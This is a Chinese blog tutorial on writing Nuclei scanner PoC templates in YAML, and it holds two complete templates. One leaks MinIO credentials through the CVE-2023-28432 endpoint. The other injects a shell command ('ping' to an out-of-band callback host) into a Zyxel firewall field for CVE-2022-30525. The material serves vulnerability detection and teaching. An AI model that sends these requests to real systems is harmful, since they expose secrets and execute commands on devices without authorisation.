Day102:漏洞发现-漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

于 2024-04-15 10:04:26 发布
阅读量961 收藏 20
点赞数 12
分类专栏: 漏洞发现 文章标签: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/137160259
版权

目录

Nuclei-Poc开发-环境配置&编写流程

Nuclei-Poc开发-Yaml语法&匹配提取

Yaml Poc模版:

开发流程:

案例1:CVE-2023-28432 (匹配结果)

案例2:CVE-2022-30525(匹配交互)

Nuclei-Poc开发-BurpSuite一键生成插件

知识点:

1、Nuclei-Poc开发-环境配置&编写流程

2、Nuclei-Poc开发-Yaml语法&匹配提取

3、Nuclei-Poc开发-BurpSuite一键生成插件

Nuclei-Poc开发-环境配置&编写流程

1、开发环境:Vscode+Yaml插件

https://code.visualstudio.com/

2、开发文档参考资料

官方文档

https://docs.projectdiscovery.io/templates/protocols/http/basic-http

nuclei poc模板编写笔记

https://blog.csdn.net/qq_41315957/article/details/126594572
https://blog.csdn.net/qq_41315957/article/details/126594670

Nuclei-Poc开发-Yaml语法&匹配提取

YAML是一种数据序列化语言,它的基本语法规则注意如下:

  • 大小写敏感
  • 使用缩进表示层级关系
  • 缩进时不允许使用Tab键,只允许使用空格。
  • 缩进的空格数目不重要,只要相同层级的元素左侧对齐即可

Yaml Poc模版:

1、编号 id(描述)

2、信息 info(描述)

3、请求 http file tcp等(漏洞以什么方式请求)

4、匹配 matchers Interactsh(对结果匹配关键字来判断是否存在漏洞)

5、提取 extractors(对结果提取页面长度、状态等来判断是否存在漏洞)

开发流程:

0、poc模版套用修改

1、poc创建独立编号

2、poc填入详细信息

3、poc提交协议流程编写

4、poc结果匹配模式判断

5、poc结果提取模式判断

案例1:CVE-2023-28432 (匹配结果)

https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md

id: CVE-2023-28432

info:
  name: MinIO集群模式信息泄露漏洞(CVE-2023-28432)
  author: xiaodisec
  severity: low
  description: 在其RELEASE.2023-03-20T20-16-18Z版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。
  reference:
    - https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md
  tags: MinIO,CVE
  
http:
  - raw:
      - |
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: word
        part: body
        words:
          - '"MINIO_ROOT_PASSWORD":'
          - '"MINIO_ROOT_USER":'
          - '"MinioEnv":'
        condition: and

案例2:CVE-2022-30525(匹配交互)

https://blog.csdn.net/weixin_43080961/article/details/124776553

id: CVE-2022-30525

info:
  name: Zyxel 防火墙远程命令注入漏洞
  author: xiaodisec
  severity: high
  description: 该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
  reference:
    - https://blog.csdn.net/weixin_43080961/article/details/124776553
  tags: zyxel,cve,rce
  
http:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exploit}}","data":"hi"}
    payloads:
      exploit:
        - ";ping -c 3 {{interactsh-url}};"
    
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

Nuclei-Poc开发-BurpSuite一键生成插件

nuclei-burp-plugin:

https://github.com/projectdiscovery/nuclei-burp-plugin

1、导入或商店安装

2、配置插件路径信息

3、数据包选择生成模版

CVE-2023-28432

然后在bp复现下这个漏洞poc,成功后右键数据包使用插件生成nuclei插件模板

CVE-2022-30525

Dao-道法自然
关注
  • 12
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vscode推荐插件20220901
过客2019
08-30 1837
安装完成后,在左侧功能面版,会多一个图标,点开始后,就有很多历史的复制记录。除了这些插件,还有很多插件, 一类是主题类,一类是文件图标类,后再我再补充。vscode的剪切板管理器,很不错,很实现,强烈推荐。...
常见poc漏洞模块,直接导入用。
07-22
一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞
漏洞发现-漏扫项目&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取
siu~
03-19 915
1、Nuclei-Poc开发-环境配置&编写流程 2、Nuclei-Poc开发-Yaml语法&匹配提取 3、Nuclei-Poc开发-BurpSuite一键生成插件 章节点: 漏洞发现-Web&框架组件&中间件&APP&小程序&系统 扫描项目-综合漏扫&特征漏扫&被动漏扫&联动漏扫 Poc开发-Ymal语法&联动导入&项目拓展 扫描插件-Burpsuite插件&浏览器插件&自动模版
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞
XXokok的博客
12-09 1443
编写Yaml文件当Poc,利用Nuclei扫描器去扫描漏洞。使用工具一键生成Yaml文件
k8s基本概念、k8s对象、三个命令玩转所有的yaml写法、给vscode安装插件、kubectl和kubelet及自动补全
一切随心走的博客
08-19 1182
k8s里面操作的资源实体,就是k8s的对象,可以使用yaml来声明对象。然后让k8s根据yaml的声明创建出这个对象;操作 Kubernetes 对象 —— 无论是创建、修改,或者删除 —— 需要使用 Kubernetes API。比如,当使用 kubectl 命令行接口时,CLI 会执行必要的 Kubernetes API 调用Kubernetes对象指的是Kubernetes系统的持久化实体,所有这些对象合起来,代表了你集群的实际情况。常规的应用里,我们把应用程序的数据存储在数据库中,
VsCode开发工具的入门及基本使用
jks212454的博客
02-23 7739
VsCode开发工具的入门及基本使用
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发
最新发布
04-22
基于python编写的Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写的Web安全检测PoC&&EXP框架+...
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
- **POC/EXP库**:收集并维护漏洞验证(Proof of Concept, POC)和利用(Exploit)脚本,以便快速利用或防御。 - **WAF和批量脚本**:部署Web应用防火墙(Web Application Firewall, WAF)以保护服务,并准备批量...
Vulnerabilities:漏洞PoC和Exp收集; Vulnerabilities PoC & Exp collections
05-25
免责声明:本项目中的代码为互联网收集或自行编写,请勿用于非法用途,产生的法律责任和本人无关。针对Windows的PoC很多会被杀毒软件拦截,此为正常现象,请自行斟酌是否下载,如果有带有后门的exp,请通过提交issue...
vscode-yaml-plus-json:VSCode扩展使yaml和json之间的转换变得简单快捷
04-04
YAML加JSON 轻松将YAML转换为JSON,反之亦然。 转换可以由单个文件或文件夹中的所有文件完成。 有什么好主意或功能要求吗? 请不要犹豫,打开! 功能和用法 转换单个文件: 右键单击一个YAML文件并将其Convert to JSON ,然后选择Convert to JSON 。 通过将文件扩展名更改为.json将YAML文件转换为JSON。 右键单击JSON文件并将其Convert to YAML ,然后选择Convert to YAML 。 通过将文件扩展名更改为.yaml或.yml将JSON文件转换为YAML。 转换文字选择: 使用命令将YAML选择Convert selection to JSON不更改文件扩展名。 使用命令将JSON选择Convert selection to YAML不更改文件扩展名。 转换多个文件: 右键单击所选文件之一,然后选
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
k8s学习之路 | Day13 k8s 模板插件和命令补全
小鲸鱼大梦想
02-23 1213
在 Shell 中导入(Sourcing)补全脚本,将启用 kubectl 自动补全功能。我们可以借助 vscode插件来快速生成一个 K8S 资源的模板 yaml 文件。kubectl 的 Bash 补全脚本可以用命令。然而,补全脚本依赖于工具。
漏洞扫描-nuclei-poc编写
告白的博客
11-10 826
Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。提供TCP、DNS、HTTP、FILE 等各类协议的扫描,通过强大且灵活的模板,可以使用Nuclei模拟各种安全检查。提取器/匹配器:提取匹配返回包内容,匹配出需要的目标(根据目标结果特征用匹配还是提取)http:漏洞利用核心, {{xx}}:提取目标地址的匹配信息。info:漏洞描述情况(级别,编号,标签,简介等)不允许tab,只能空格。
浅尝 Nuclei POC 编写
qq_46081990的博客
12-21 3219
本文讲解了如何使用 YAML 语言编写漏扫工具 Nuclei 的 POC,以两个不同类型的 CVE 为例,介绍了匹配结果和匹配交互的两种情况该如何编写 POC,最后引入并介绍了一款辅助生成 Nuclei POC 模板的 BurpSuite 插件(Nuclei Template Generator Plugin)
如何通过Burp Suite专业版构建CSRF PoC
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-15 729
Burp Suite是一款强大的渗透测试利器,可以利用它来高效的执行渗透攻击,接下来介绍如何通过Burp Suite Pro来构建CSRF PoC。pushState'''''/'
vscode 常用插件
PHP代码的博客
10-28 1208
balazs4.gitlab-pipeline-monitor # 监控 GitLab CI Pipeline 状态 bmewburn.vscode-intelephense-client # PHP 必备 bungcip.better-toml # TOML 文件支持 CoenraadS.bracket-pair-colorizer # 彩虹括号对 dbaeumer.vscode-eslint # ESLint 支持 DotJoshJohnson.xml # XML 文件支持 eamodio.gitlen
vscode 调试运行 flutter 报:没有用于调试YAML的扩展。我们是否应在市场中找到YAML扩展?
孤舟残月梦还长存的专栏
02-13 5850
这个是低级问题,这是把pubspec.yaml 文件打开的时候并且处于焦点位置去调试编译出错的,示意图: 应该切换到项目文件或者切换到 main.dart 文件并且处于焦点位置才去调试编译,这时候不会报错了,要不关闭pubspec.yaml 文件然后去调试编译。 打开pubspec.yaml 文件修改后保存文件,vscode 会默认执行 flutter pub get 命令,然后自动下载依赖文件,前提是必须安装有 YAML 插件。因为pubspec.yaml 文件包含特...
解决 poc-yaml-druid-monitor-unauth 漏洞
07-20
您好!对于解决 poc-yaml-druid-monitor-unauth 漏洞,您可以采取以下步骤: 1. 更新和升级:确保您正在使用的Druid版本是最新的,并应用任何可用的安全补丁。及时更新软件可以解决已知的漏洞。 2. 访问控制:配置Druid监控界面的访问控制,限制只有授权的用户才能访问。您可以通过认证、授权或者访问控制列表等方法来限制访问权限。 3. 审查配置:仔细审查Druid监控界面的配置文件,确保没有配置错误或者允许未经授权的访问。 4. 防火墙规则:在服务器上设置防火墙规则,只允许受信任的IP地址或者IP地址范围访问Druid监控界面。 5. 安全审计:定期进行安全审计,检查Druid监控界面是否存在任何安全漏洞或配置错误。 6. 监控和日志:设置监控和日志记录,及时检测和响应任何异常活动或潜在的攻击。 请注意,以上仅为一般性建议,具体的解决方法可能因实际情况而异。在实施任何安全措施之前,请确保您了解您的系统和环境,并充分测试和评估任何更改的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值